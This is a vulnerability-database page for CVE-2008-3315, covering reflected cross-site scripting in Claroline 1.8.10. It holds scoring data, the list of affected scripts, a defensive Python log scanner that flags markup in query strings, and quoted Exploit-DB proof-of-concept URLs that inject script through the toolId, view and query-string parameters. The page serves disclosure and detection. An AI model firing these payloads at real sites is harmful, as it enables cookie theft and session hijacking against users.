CVE-2008-3315
Published 2008-07-25
Priority P4 · 20 · medium · CVSS 2.0: 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 2.03% (78.6th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.8.10 allow remote attackers to inject arbitrary web script or HTML via the (1) query string to (a) announcements/messages.php; (b) lostPassword.php and (c) profile.php in auth/; (d) calendar/myagenda.php; (e) group/group.php; (f) learningPath.php, (g) learningPathList.php, and (h) module.php in learnPath/; (i) phpbb/index.php; (j) courseLog.php, (k) course_access_details.php, (l) delete_course_stats.php, (m) userLog.php, and (n) user_access_details.php in tracking/; (o) user/user.php; and (p) user/userInfo.php; the (2) view parameter to (q) tracking/courseLog.php; and the (3) toolId parameter to (r) tracking/toolaccess_details.php. NOTE: this may overlap CVE-2006-3257 and CVE-2005-1374.
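One way to review web access logs for requests matching the description above, as an added example that is not part of the CVE record or of Claroline's code: it flags requests to the listed scripts whose query string contains attribute- or tag-breaking characters after URL decoding. The Apache-style log format, the `/lms/` install directory, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Scripts named in the CVE-2008-3315 description, relative to the claroline/ directory.
AFFECTED = {
    "announcements/messages.php", "auth/lostPassword.php", "auth/profile.php",
    "calendar/myagenda.php", "group/group.php", "learnPath/learningPath.php",
    "learnPath/learningPathList.php", "learnPath/module.php", "phpbb/index.php",
    "tracking/courseLog.php", "tracking/course_access_details.php",
    "tracking/delete_course_stats.php", "tracking/userLog.php",
    "tracking/user_access_details.php", "tracking/toolaccess_details.php",
    "user/user.php", "user/userInfo.php",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
MARKUP_RE = re.compile(r'[<>"]')  # characters that break out of an HTML attribute or tag

def decode(query, rounds=2):
    """URL-decode up to `rounds` times so double-encoded input is also seen."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def flag_requests(lines):
    """Return (script, decoded query) for suspicious requests to affected scripts."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # The install directory varies; match on what follows the last /claroline/.
        script = url.path.rpartition("/claroline/")[2]
        query = decode(url.query)
        if script in AFFECTED and MARKUP_RE.search(query):
            hits.append((script, query))
    return hits

# Constructed sample log lines (not real traffic); the marker "x" stands in for any payload.
SAMPLE = [
    '203.0.113.5 - - [25/Jul/2008:10:00:00 +0000] "GET /lms/claroline/tracking/toolaccess_details.php?toolId=%22%3Ex HTTP/1.1" 200 512',
    '203.0.113.6 - - [25/Jul/2008:10:00:01 +0000] "GET /lms/claroline/tracking/courseLog.php?view=1 HTTP/1.1" 200 900',
    '203.0.113.7 - - [25/Jul/2008:10:00:02 +0000] "GET /lms/claroline/user/user.php?%2522%253Ex HTTP/1.1" 200 700',
    '203.0.113.8 - - [25/Jul/2008:10:00:03 +0000] "GET /lms/claroline/course/index.php?q=%3Cb%3E HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for script, query in flag_requests(SAMPLE):
        print(f"suspicious query on {script}: {query!r}")
```

A hit only shows that markup characters reached an affected script; whether they were reflected unescaped depends on the installed version, which the page gives as anything prior to 1.8.11.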
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| claroline | claroline | — | — |
No detection rules found.
Exploit-DB
Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting
exploitdb·2008-07-22
---
source: https://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/tracking/toolaccess_details.php?toolId=">alert('DSecRG XSS')
Exploit-DB
Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting
exploitdb·2008-07-22
---
source: https://www.securityfocus.com/bid/30346/info
http://www.example.com/[installdir]/claroline/tracking/courseLog.php?view=DSec" STYLE="xss:expression(alert('DSecRG XSS'))
Exploit-DB
Claroline 1.8 - 'user/user.php' Query String Cross-Site Scripting
exploitdb·2008-07-22
---
source: https://www.securityfocus.com/bid/30346/info
http://www.example.com/[installdir]/claroline/user/user.php?">alert('DSecRG XSS')
Exploit-DB
Claroline 1.8 - 'learnPath/calendar/myagenda.php' Query String Cross-Site Scripting
exploitdb·2008-07-22
---
source: https://www.securityfocus.com/bid/30346/info
http://www.example.com/[installdir]/claroline/calendar/myagenda.php?">alert('DSecRG XSS')
No writeups or analysis indexed.
http://secunia.com/advisories/31201
http://securityreason.com/securityalert/4041
http://sourceforge.net/project/shownotes.php?release_id=615030
http://wiki.claroline.net/index.php/Changelog_1.8.x#Modification_between_claroline_1.8.10_and_1.8.11
http://www.securityfocus.com/archive/1/494655/100/0/threaded
http://www.securityfocus.com/bid/30346
http://www.vupen.com/english/advisories/2008/2167/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/43962
Published: 2008-07-25